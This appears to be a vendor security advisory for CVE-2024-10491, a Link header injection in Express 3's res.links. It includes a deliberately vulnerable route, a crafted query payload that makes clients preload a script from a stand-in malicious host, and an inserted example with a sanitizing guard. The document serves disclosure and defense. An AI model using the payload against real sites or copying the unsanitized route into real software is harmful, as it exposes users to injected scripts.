CVE-2024-10491

Resource Injection
Affects
Express
<=3.21.4
in
Express
Patch Available
This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview


A vulnerability has been identified in the Express `response.links` function (`res.links`). The function wraps each supplied URL in `<` and `>` and appends `; rel="..."` without sanitizing the value, so passing unsanitized data to it allows arbitrary link values to be injected into the `Link` header.

Because `,` separates link values and `;` separates parameters in the `Link` header grammar, a value containing `>`, `,`, `;` and `<` can close the intended link and append further ones, for example a `rel="preload"` entry that makes the client preload a malicious script.

The issue is relevant wherever the link target is built from dynamic, request-controlled data such as query parameters.

Details

Module Info

Steps To Reproduce

  • Create an Express application that passes a query parameter straight into res.links:
var express = require('express')
var app = express()

// Vulnerable: req.query.resource is attacker-controlled and reaches the Link header unsanitized.
app.get('/', function (req, res) {
  res.links({ preload: req.query.resource });
  res.send('ok');
});

app.listen(3000);

  • Send a specially crafted value for the resource parameter so that the single Link header carries multiple link values. For example:
// The value first closes the <...> the application intended with `>; rel="preload"`,
// then appends additional link values of its own, including a preloaded script.
const maliciousQueryParam = '?resource=http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';

const url = `http://localhost:3000/${maliciousQueryParam}`;
fetch(url).then((res) => console.log(res.headers.get('link')));

  • The response's single Link header now carries three link values, the second pointing at the attacker's script:
<http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com>; rel="preload"
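To make the injection mechanism above concrete, here is an added example; it is not code from the advisory, from HeroDevs, or from Express itself. `buildLinkHeader` reproduces the shape of the serialization visible in the output above (each URL wrapped in `<` and `>`, `; rel="..."` appended, values joined by `, `, no sanitization). `parseLinkHeader` is a minimal Link header parser used to count how many link values a consumer would see. `safeLinkValue` and `buildSafeLinkHeader` are an assumed application-side guard, not an Express API, that rejects any value which is not an absolute http(s) URL or which contains the header's delimiter characters. The attacker value is the advisory's payload in decoded form.

```javascript
// Added example: vulnerable Link header construction beside an application-side guard.
// `URL` is the WHATWG URL global available in Node.js (no import needed).

// Approximation of how res.links serializes links: the URL is inserted verbatim.
function buildLinkHeader(links) {
  return Object.keys(links)
    .map((rel) => `<${links[rel]}>; rel="${rel}"`)
    .join(', ');
}

// Minimal Link header parser (RFC 8288 shape): one entry per <URI-reference>,
// with the following `; key=value` parameters attached to it.
function parseLinkHeader(header) {
  const out = [];
  const re = /<([^>]*)>((?:\s*;\s*[^;,]+)*)/g;
  let m;
  while ((m = re.exec(header)) !== null) {
    const params = {};
    for (const p of m[2].split(';').map((s) => s.trim()).filter(Boolean)) {
      const [k, v = ''] = p.split('=');
      params[k.trim()] = v.trim().replace(/^"|"$/g, '');
    }
    out.push({ url: m[1], params });
  }
  return out;
}

// Assumed guard (hypothetical helper, not part of Express): accept only an
// absolute http(s) URL and reject anything carrying Link header delimiters
// ('<', '>', ',', ';', '"') or CR/LF/whitespace. Rejecting is preferred over
// encoding because an unexpected delimiter means the input is not a URL we want.
function safeLinkValue(value) {
  if (typeof value !== 'string') return null;
  if (/[<>,;"\r\n\s]/.test(value)) return null;
  let parsed;
  try {
    parsed = new URL(value);
  } catch {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  // Emit the normalized, percent-encoded form rather than the raw input.
  return parsed.href;
}

// Hardened counterpart of buildLinkHeader: returns null (caller should refuse the
// request) instead of emitting a partially attacker-controlled header.
function buildSafeLinkHeader(links) {
  const clean = {};
  for (const rel of Object.keys(links)) {
    if (!/^[A-Za-z][A-Za-z0-9._-]*$/.test(rel)) return null;
    const url = safeLinkValue(links[rel]);
    if (url === null) return null;
    clean[rel] = url;
  }
  return buildLinkHeader(clean);
}

// Constructed attacker value: the advisory's payload after query-string decoding.
const MALICIOUS =
  'http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';

// What a client would see after the vulnerable serializer handles `resource`.
function demo(resource) {
  const header = buildLinkHeader({ preload: resource });
  const links = parseLinkHeader(header);
  return { header, count: links.length, urls: links.map((l) => l.url) };
}

// Usage: the vulnerable path yields three link values, one of them the attacker's
// script; the guarded path refuses the value outright.
console.log(demo(MALICIOUS).urls);
console.log(buildSafeLinkHeader({ preload: MALICIOUS })); // null
console.log(buildSafeLinkHeader({ preload: 'http://api.example.com/users?resource=1' }));
```

The guard deliberately rejects rather than escapes: percent-encoding `<`, `>` or `,` would keep the request alive, but a URL that contains raw header delimiters is not a URL the application meant to advertise, and refusing it also keeps the header free of `rel` or `as` parameters the attacker chose.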

Proof Of Concept

A full reproduction with code similar to the above can be found here:

<source> resource injection vulnerability POC

Credits

  • Abze

Mitigation

The Express project is End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from Express 3.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Stay secure and ensure your systems are updated with the latest patches from HeroDevs. For more insights and security updates, keep following our blog.

Vulnerability Details

ID: CVE-2024-10491
Project Affected: Express
Versions Affected: <=3.21.4
Published date: October 29, 2024
≈ Fix date: October 29, 2024
Fixed in:
Severity: Medium
Category: Resource Injection